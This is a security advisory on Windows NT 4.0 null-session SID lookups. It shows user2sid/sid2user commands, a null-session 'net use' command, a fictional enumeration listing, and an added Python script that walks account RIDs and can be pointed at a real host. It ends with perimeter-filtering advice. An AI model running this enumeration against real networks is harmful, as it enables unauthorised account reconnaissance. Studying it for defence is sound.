COMMAND
name of built-in administrator
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Originally this was found by David LeBlanc and Dominique
Brezinski. Evgenii Borisovich Rudnyi pointed it out again. He
wrote two utilities, user2sid and sid2user, which are simply
command line interfaces to the Win32 functions LookupAccountName
and LookupAccountSid. So, no hacking, just what is permitted by MS.
To call these functions a user only needs to be a member of
EVERYONE. This means that an ordinary user can find, without any
problem, the name of the built-in domain administrator account,
which MS recommends renaming from Administrator to something else
(see for example course 803, Administering Windows NT 4.0).
Assuming that the user's computer is in the domain, the task takes
two steps.
1) Look up the SID of any domain account, for example Domain
Users:
user2sid "domain users"
S-1-5-21-201642981-56263093-24269216-513
Now we know all the subauthorities for the current domain: every
domain account SID shares them and differs only in the last
number (the so-called RID, relative identifier).
2) Look up the built-in administrator name (its RID is always 500):
sid2user 5 21 201642981 56263093 24269216 500
Name is SmallUser
Domain is DomainName
Type of SID is SidTypeUser
Now it is possible to look up all the domain accounts from the
very first one (RID = 1000 for the first account created, 1001 for
the second and so on; RIDs are never reused within the current
installation, so a deleted account leaves its RID behind with the
type SidTypeDeletedAccount rather than handing it to a new one).
sid2user 5 21 201642981 56263093 24269216 1000
sid2user 5 21 201642981 56263093 24269216 1001
...
Reading the whole sequence gives anyone the history of how the
domain account database was built up. Well, this is not the end of
the story. The anonymous logon is also a member of EVERYONE. This
means that it is actually possible to find out who the built-in
administrator is and to see the history of the SAM in any domain
into which you can establish an anonymous (null) session. Note
that anonymous sessions are not audited by the logon/logoff
category. Below is an example of what you can learn provided the
NetBIOS ports are open (the listing is fictional).
nslookup www.xyz.com
Non-authoritative answer:
Name: www.xyz.com
Address: 131.107.2.200
net use \\131.107.2.200\ipc$ "" /user:""
The command completed successfully.
user2sid \\131.107.2.200 "domain users"
S-1-5-21-201642981-56263093-24269216-513
Number of subauthorities is 5
Domain is XYZ_domain
Length of SID in memory is 28 bytes
Type of SID is SidTypeGroup
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500
Name is XYZAdmin
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000
Name is
Domain is XYZ_domain
Type of SID is SidTypeDeletedAccount
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001
Name is Simpson
Domain is XYZ_domain
Type of SID is SidTypeUser
sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112
LookupSidName failed - no such account
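The two-step procedure above and the null-session walk in the listing, written out as an added example; this is not one of Rudnyi's tools and not code from the original advisory. It parses a textual SID into the binary layout that LookupAccountSid consumes (which is why sid2user reports 28 bytes for a five-subauthority SID), derives the domain SID by dropping the RID, resolves RID 500 to get the real administrator name, and then walks RIDs upward from 1000 until lookups fail. The lookup itself is passed in as a callable: sample_lookup and SAMPLE_ACCOUNTS are constructed from the fictional listing so the block runs offline, and win32_lookup is an assumed adapter for a real run through pywin32's win32security.LookupAccountSid on Windows, after the null session has been set up with net use as shown above.

```python
import struct

# SID_NAME_USE values from winnt.h; sid2user prints the symbolic names.
SID_TYPE_USER = 1
SID_TYPE_GROUP = 2
SID_TYPE_DOMAIN = 3
SID_TYPE_ALIAS = 4
SID_TYPE_WELL_KNOWN_GROUP = 5
SID_TYPE_DELETED_ACCOUNT = 6
SID_TYPE_INVALID = 7
SID_TYPE_UNKNOWN = 8

ADMINISTRATOR_RID = 500   # built-in Administrator, fixed in every NT domain
FIRST_USER_RID = 1000     # first RID handed out to a created account


def parse_sid(text):
    """Split 'S-1-5-21-...-513' into (revision, authority, [subauthorities])."""
    parts = text.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError("not a textual SID: %r" % text)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or not 1 <= len(subs) <= 15:
        raise ValueError("malformed SID: %r" % text)
    return revision, authority, subs


def format_sid(revision, authority, subs):
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_to_bytes(text):
    """Binary form LookupAccountSid consumes: 1-byte revision, 1-byte
    sub-authority count, 48-bit big-endian identifier authority, then each
    sub-authority as a 32-bit little-endian integer. A five-sub-authority
    domain account SID is therefore 2 + 6 + 5*4 = 28 bytes, as sid2user reports."""
    revision, authority, subs = parse_sid(text)
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def domain_sid(text):
    """Drop the RID: all but the last sub-authority identify the domain."""
    revision, authority, subs = parse_sid(text)
    return format_sid(revision, authority, subs[:-1])


def enumerate_domain(known_sid, lookup, start=FIRST_USER_RID, max_misses=1):
    """The advisory's procedure: derive the domain SID from any account SID,
    resolve RID 500 to get the real Administrator name, then walk RIDs from
    `start` until `max_misses` consecutive lookups fail (NT 4 allocates RIDs
    sequentially and never reuses them, so the first unallocated RID marks
    the end; a deleted account still resolves, with SidTypeDeletedAccount).
    `lookup(sid_text)` returns (name, domain, sid_type) or None.
    Returns (administrator_name, [(rid, name, domain, sid_type), ...])."""
    domain = domain_sid(known_sid)
    admin = lookup(domain + "-%d" % ADMINISTRATOR_RID)
    accounts, misses, rid = [], 0, start
    while misses < max_misses:
        entry = lookup(domain + "-%d" % rid)
        if entry is None:
            misses += 1
        else:
            misses = 0
            accounts.append((rid,) + tuple(entry))
        rid += 1
    return (admin[0] if admin else None), accounts


def win32_lookup(server):
    """Adapter for a real run on Windows (assumption: pywin32 is installed and
    a null session to `server` already exists, e.g. net use \\\\host\\ipc$ "" /user:"").
    win32security.LookupAccountSid(system, sid) returns (name, domain, type)."""
    import pywintypes, win32security  # assumed: pywin32

    def lookup(sid_text):
        try:
            return win32security.LookupAccountSid(
                server, win32security.ConvertStringSidToSid(sid_text))
        except pywintypes.error:       # "no such account" for an unallocated RID
            return None
    return lookup


# Constructed sample mirroring the fictional listing above (no real host).
SAMPLE_DOMAIN = "S-1-5-21-201642981-56263093-24269216"
SAMPLE_ACCOUNTS = {
    SAMPLE_DOMAIN + "-500":  ("XYZAdmin", "XYZ_domain", SID_TYPE_USER),
    SAMPLE_DOMAIN + "-513":  ("Domain Users", "XYZ_domain", SID_TYPE_GROUP),
    SAMPLE_DOMAIN + "-1000": ("", "XYZ_domain", SID_TYPE_DELETED_ACCOUNT),
    SAMPLE_DOMAIN + "-1001": ("Simpson", "XYZ_domain", SID_TYPE_USER),
}


def sample_lookup(sid_text):
    return SAMPLE_ACCOUNTS.get(sid_text)


if __name__ == "__main__":
    admin, accounts = enumerate_domain(SAMPLE_DOMAIN + "-513", sample_lookup)
    print("built-in administrator is", admin)
    for rid, name, dom, kind in accounts:
        print(rid, dom + "\\" + name, "type", kind)
```

With the constructed sample the walk stops at RID 1002, the first unallocated one, which is the same stop condition as the failed lookup of RID 1112 in the listing; raise max_misses if a target is suspected of having gaps. On a real domain, replace sample_lookup with win32_lookup(r"\\131.107.2.200") after the net use command.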
For those who would like to try it, the utilities can be found at:
http://www.ntbugtraq.com
and follow the links to the new downloads page where you'll find
his usage page with a link to the zip.
SOLUTION
SP3 does not prevent this. At this time there is no fix, except
to filter connections to TCP port 139 at the network perimeter.
Note that filtering only blocks the null-session variant from
outside: any authenticated domain user can still do the lookups
from inside, and the RestrictAnonymous registry value introduced
with SP3 (see Q143474) restricts anonymous SAM enumeration but not
the LSA SID/name translation these tools use. So, at the moment,
if you can get a null session, you can dump all the users, groups,
and machine accounts.